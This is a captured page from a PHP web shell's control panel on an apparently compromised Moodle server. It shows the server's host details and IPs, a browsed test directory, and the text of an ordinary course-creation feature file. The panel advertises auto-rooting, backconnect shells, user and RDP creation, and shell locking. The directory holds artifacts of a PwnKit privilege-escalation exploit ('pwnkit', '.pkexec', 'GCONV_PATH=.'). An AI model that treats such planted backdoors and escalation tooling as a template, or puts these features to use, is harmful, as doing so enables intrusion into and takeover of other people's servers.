Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
course /
tests /
behat /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
activities_edit_completion.fea...
2.4
KB
-rwxrwxrwx
activities_edit_name.feature
1.75
KB
-rwxrwxrwx
activities_group_icons.feature
1.79
KB
-rwxrwxrwx
activities_indentation.feature
2.06
KB
-rwxrwxrwx
activities_visibility_icons.fe...
8.61
KB
-rwxrwxrwx
activity_chooser.feature
11.91
KB
-rwxrwxrwx
activity_navigation.feature
16.58
KB
-rwxrwxrwx
activity_navigation_with_restr...
3.38
KB
-rwxrwxrwx
add_activities.feature
2.19
KB
-rwxrwxrwx
behat_course.php
84.14
KB
-rwxrwxrwx
category_change_visibility.fea...
17.1
KB
-rwxrwxrwx
category_management.feature
22.89
KB
-rwxrwxrwx
category_resort.feature
10.92
KB
-rwxrwxrwx
category_role_assignment.featu...
1.57
KB
-rwxrwxrwx
course_browsing.feature
4.21
KB
-rwxrwxrwx
course_category_management_lis...
43.87
KB
-rwxrwxrwx
course_change_visibility.featu...
5.88
KB
-rwxrwxrwx
course_contact.feature
7.35
KB
-rwxrwxrwx
course_controls.feature
9.27
KB
-rwxrwxrwx
course_creation.feature
4.15
KB
-rwxrwxrwx
course_format.feature
4.1
KB
-rwxrwxrwx
course_relativedatesmode.featu...
2.09
KB
-rwxrwxrwx
course_request.feature
4.09
KB
-rwxrwxrwx
course_resort.feature
11.28
KB
-rwxrwxrwx
course_search.feature
1.59
KB
-rwxrwxrwx
coursetags.feature
3.96
KB
-rwxrwxrwx
create_delete_course.feature
5.13
KB
-rwxrwxrwx
customfields_locked.feature
1.26
KB
-rwxrwxrwx
customfields_visibility.featur...
3.39
KB
-rwxrwxrwx
edit_settings.feature
2.49
KB
-rwxrwxrwx
force_group_mode.feature
2.11
KB
-rwxrwxrwx
frontpage_display_modes.featur...
3.15
KB
-rwxrwxrwx
general_section.feature
1.5
KB
-rwxrwxrwx
keyholder.feature
2.23
KB
-rwxrwxrwx
max_number_sections.feature
1.95
KB
-rwxrwxrwx
move_activities.feature
2.14
KB
-rwxrwxrwx
move_sections.feature
2.6
KB
-rwxrwxrwx
navigate_course_list.feature
3.09
KB
-rwxrwxrwx
paged_course_navigation.featur...
5.97
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
recommend_activities.feature
2
KB
-rwxrwxrwx
rename_roles.feature
2.47
KB
-rwxrwxrwx
restrict_available_activities....
1.88
KB
-rwxrwxrwx
role_renaming.feature
1.7
KB
-rwxrwxrwx
search_recommended_activities....
1
KB
-rwxrwxrwx
section_highlighting.feature
1.78
KB
-rwxrwxrwx
section_visibility.feature
2.24
KB
-rwxrwxrwx
view_subfolders_inline.feature
3.04
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : course_creation.feature
@core @core_course Feature: Managers can create courses In order to group users and contents As a manager I need to create courses and set default values on them @javascript Scenario: Courses are created with the default announcements forum Given the following "users" exist: | username | firstname | lastname | email | | teacher1 | Teacher | 1 | teacher1@example.com | | student1 | Student | 1 | student1@example.com | And I log in as "admin" And I create a course with: | Course full name | Course 1 | | Course short name | C1 | And I enrol "Teacher 1" user as "Teacher" And I enrol "Student 1" user as "Student" And I log out When I log in as "teacher1" And I am on "Course 1" course homepage with editing mode on And I add the "Latest announcements" block And I am on the Announcements "forum activity" page And "Add a new topic" "link" should exist And "Subscription mode > Forced subscription" "link" should not exist in current page administration And "Subscription mode > Forced subscription" "text" should exist in current page administration And I log out And I am on the Announcements "forum activity" page logged in as student1 And "Add a new topic" "link" should not exist And "Forced subscription" "text" should exist in current page administration Scenario: Create a course from the management interface and return to it Given the following "courses" exist: | fullname | shortname | idnumber | startdate | enddate | | Course 1 | Course 1 | C1 | 957139200 | 960163200 | And I log in as "admin" And I go to the courses management page And I should see the "Categories" management page And I click on category "Miscellaneous" in the management interface And I should see the "Course categories and courses" management page And I click on "Create new course" "link" in the "#course-listing" "css_element" When I set the following fields to these values: | Course full name | Course 2 | | Course short name | Course 2 | | Course summary | Course 2 summary | | id_startdate_day | 24 | | id_startdate_month | October | | id_startdate_year | 2015 | | id_enddate_day | 24 | | id_enddate_month | October | | id_enddate_year | 2016 | And I press "Save and return" Then I should see the "Course categories and courses" management page And I click on "Sort by Course time created ascending" "link" in the ".course-listing-actions" "css_element" And I should see course listing "Course 1" before "Course 2" And I click on "Course 2" "link" in the "region-main" "region" And I click on "Edit" "link" in the ".course-detail" "css_element" And the following fields match these values: | Course full name | Course 2 | | Course short name | Course 2 | | Course summary | Course 2 summary | | id_startdate_day | 24 | | id_startdate_month | October | | id_startdate_year | 2015 | | id_enddate_day | 24 | | id_enddate_month | October | | id_enddate_year | 2016 | Scenario: Create a course as a custom course creator Given the following "users" exist: | username | firstname | lastname | email | | kevin | Kevin | the | kevin@example.com | And the following "roles" exist: | shortname | name | archetype | | creator | Creator | | And the following "system role assigns" exist: | user | role | contextlevel | | kevin | creator | System | And the following "role capability" exists: | role | creator | | moodle/course:create | allow | | moodle/course:manageactivities | allow | | moodle/course:viewparticipants | allow | And I log in as "kevin" And I am on site homepage When I press "Add a new course" And I set the following fields to these values: | Course full name | My first course | | Course short name | myfirstcourse | And I press "Save and display" And I follow "Participants" Then I should see "Kevin the" And I should see "Teacher"
Close